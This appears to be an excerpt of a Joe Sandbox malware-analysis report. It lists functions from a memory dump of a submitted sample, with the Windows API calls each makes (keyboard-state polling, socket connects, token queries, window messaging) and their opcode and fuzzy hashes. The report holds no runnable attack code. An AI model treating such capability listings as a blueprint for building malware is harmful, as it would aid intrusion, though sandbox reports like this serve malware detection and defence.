                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                    • Instruction ID: f41ef6cbb15d18cd0266bc830c61e1e262a8dc5aa5144f4e5e22b06930931c0f
                                    • Opcode Fuzzy Hash: 216ae4503c445e081f5097d13f7258f4c21c1b126f4b8fbd18a0eb4e6a99748f
                                    • Instruction Fuzzy Hash: E041D6BA900288ABC712DBA9CC44FA9BB6DEB09310F150125F999A72D1C735AD93D650
                                    Function 009D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009D12B4
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009D12DD
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009D131C
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009D1341
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009D1349
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: 92e8e25c122fb6311153ef8a5dfb7505a391679b782925f7b648e39687998d07
                                    • Instruction ID: f12d4596195c992b312c1df55a5801760007c0e724cb4dc6041b06f42d1e778d
                                    • Opcode Fuzzy Hash: 92e8e25c122fb6311153ef8a5dfb7505a391679b782925f7b648e39687998d07
                                    • Instruction Fuzzy Hash: DE411E35A00105EFDF05EF64C991AADBBF5FF48314B148099E90AAB3A2DB31ED01DB51
                                    Function 0099B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(000000FF), ref: 0099B64F
                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                    • GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                    • GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                    • Instruction ID: f6a7a8fafbd93550d49abd26436b8ce96c3df173ec389a75aa85611e7e7daf48
                                    • Opcode Fuzzy Hash: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                    • Instruction Fuzzy Hash: 5F418E31508119FBDF159FA8C944EE9BBB9FB45324F10431AF829962D0CB35AD90DFA1
                                    Function 009BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 009BB369
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 009BB413
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009BB41B
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 009BB429
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009BB431
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                    • Instruction ID: 025e88641fb9610e96f29031e6e064ee322349f2ac1b8cfce7f659cc080a8dd9
                                    • Opcode Fuzzy Hash: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                    • Instruction Fuzzy Hash: 36319F7290021DEBDB04CFA8DE8DADE7BB6FB04325F104229F925A71D1C7B09955CB90
                                    Function 009BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 009BDBD7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009BDBF4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009BDC2C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009BDC52
                                    • _wcsstr.LIBCMT ref: 009BDC5C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: a886fe5fc44b61f89386637e18e2951cb70d5d567e0912dd5bb53ff21af25230
                                    • Instruction ID: 4bcacdbdd1604d1510fb95b35f347c23df98bff4d84b27765bbb3e378516c885
                                    • Opcode Fuzzy Hash: a886fe5fc44b61f89386637e18e2951cb70d5d567e0912dd5bb53ff21af25230
                                    • Instruction Fuzzy Hash: AF212972205104BBEB159F799D49EBB7FACDF85770F108039F809CA191FAA1CC42D2A0
                                    Function 009BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009BBC90
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBCC2
                                    • __itow.LIBCMT ref: 009BBCDA
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBD00
                                    • __itow.LIBCMT ref: 009BBD11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                    • Instruction ID: d6d32cd225202b5a698eb260678cb495c334d442a4fe10cf93310dd899c08739
                                    • Opcode Fuzzy Hash: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                    • Instruction Fuzzy Hash: 1621C9756002187FDB10AEA98D85FDE7E6DAFC9720F001424F945EB1C1DBA4C94587A1
                                    Function 009C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009850E6: _wcsncpy.LIBCMT ref: 009850FA
                                    • GetFileAttributesW.KERNEL32(?,?,?,?,009C60C3), ref: 009C6369
                                    • GetLastError.KERNEL32(?,?,?,009C60C3), ref: 009C6374
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C6388
                                    • _wcsrchr.LIBCMT ref: 009C63AA
                                      • Part of subcall function 009C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C63E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                    • String ID:
                                    • API String ID: 3633006590-0
                                    • Opcode ID: 7c5e685efc3dfff854ac5bbe1a1a8c698449567d525b21a76f615b2b41a28027
                                    • Instruction ID: cacf813f4bfd606e86c5cdef541253b5b8062dc7a82173b70f0aa8cdb3754b0f
                                    • Opcode Fuzzy Hash: 7c5e685efc3dfff854ac5bbe1a1a8c698449567d525b21a76f615b2b41a28027
                                    • Instruction Fuzzy Hash: DB21D531D042559AEF15EBB8AC52FEA33ACEF4A3A0F10446DF045D71C1EB60D9858A67
                                    Function 009D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009D8BD3
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8BE2
                                    • connect.WSOCK32(00000000,?,00000010), ref: 009D8BFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 3701255441-0
                                    • Opcode ID: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                    • Instruction ID: 7c4b292ce7a3bce6c5dfa2f36f78a63af232fafa12769bda1bdb5b94bebaa562
                                    • Opcode Fuzzy Hash: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                    • Instruction Fuzzy Hash: 39218172640114AFCB10EFA8CC55F7E77ADEF88710F04845AF95697392CB74E8028761
                                    Function 009D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 009D8441
                                    • GetForegroundWindow.USER32 ref: 009D8458
                                    • GetDC.USER32(00000000), ref: 009D8494
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009D84A0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 009D84DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                    • Instruction ID: 4346595cb9496d090c06d284934debf24a9faf906dc952b5c034e7057b91f8d6
                                    • Opcode Fuzzy Hash: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                    • Instruction Fuzzy Hash: 97215176A00204AFD700EFA5D985BAEBBE5EF88301F04C479F85997352DB70AD41CB60
                                    Function 0099AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                    • SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                    • BeginPath.GDI32(?), ref: 0099B009
                                    • SelectObject.GDI32(?,00000000), ref: 0099B033
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                    • Instruction ID: 0407fee56f97240af4c0c4db4f2ee41a9ddbd4750d3aa1ad6e92111dd11bd63d
                                    • Opcode Fuzzy Hash: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                    • Instruction Fuzzy Hash: E521AFB9800309EFDB10DFD9ED48BAABB6CFB52355F15431AF525920A0D3B58883CB90
                                    Function 009A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __calloc_crt.LIBCMT ref: 009A21A9
                                    • CreateThread.KERNEL32(?,?,009A22DF,00000000,?,?), ref: 009A21ED
                                    • GetLastError.KERNEL32 ref: 009A21F7
                                    • _free.LIBCMT ref: 009A2200
                                    • __dosmaperr.LIBCMT ref: 009A220B
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                    • String ID:
                                    • API String ID: 2664167353-0
                                    • Opcode ID: 841335d0bcba3bf33a47b96b72177c6d2d8f9e853a2bf228162c3c7669c894b1
                                    • Instruction ID: cc628d652ebea11f75c40e0e20232923a32f54cea11cdaa1f454e2e78ed9aec6
                                    • Opcode Fuzzy Hash: 841335d0bcba3bf33a47b96b72177c6d2d8f9e853a2bf228162c3c7669c894b1
                                    • Instruction Fuzzy Hash: B211C8331083066FDB15AFE9DC42F6B7BA8EF87770B100429FD2486151DB71D81286E1
                                    Function 009BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                    • GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                    • GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                    • RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                    • Instruction ID: e13ffeb58ba7f76e61c471c4d7c33f12bfc0efa357fb45ba224b6d745f1a176c
                                    • Opcode Fuzzy Hash: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                    • Instruction Fuzzy Hash: CE013C72210208BFDB108FE9DD48DAB7FADEF8A765B100529F945C3260DA71DC82CB61
                                    Function 009B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.OLE32 ref: 009B9ADC
                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                    • CLSIDFromString.OLE32(?,?), ref: 009B9B21
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                    • Instruction ID: ef17fe7bae4682569559db4b1774bdb429d49baf704eee42b95cd15255079f72
                                    • Opcode Fuzzy Hash: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                    • Instruction Fuzzy Hash: EC018F7A62022CBFDB108FD4EE44BAA7AEDEF44361F148028FA05D2210D770DD469BA0
                                    Function 009C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A74
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A82
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A8A
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A94
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                    • Instruction ID: 90072e661afcd169f612c522bb6e42a8a8329af3c2936b86e3f45d09f10f7d9b
                                    • Opcode Fuzzy Hash: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                    • Instruction Fuzzy Hash: 4E010536C0461DABDF00EFE5E888AEDFB78FB18711F000559E502B2150DB3496528BA2
                                    Function 009BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009BAADA
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAE4
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAF3
                                    • RtlAllocateHeap.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAFA
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAB10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                    • Instruction ID: 7ab4e8404768c1693cf2ed509aeb530c2fe054de047bc889e14288a7babae9fd
                                    • Opcode Fuzzy Hash: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                    • Instruction Fuzzy Hash: 50F062762102186FEB114FE4EC88EA73B6DFF45765F000129FA56C7190CB609C43CB61
                                    Function 009BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                    • RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
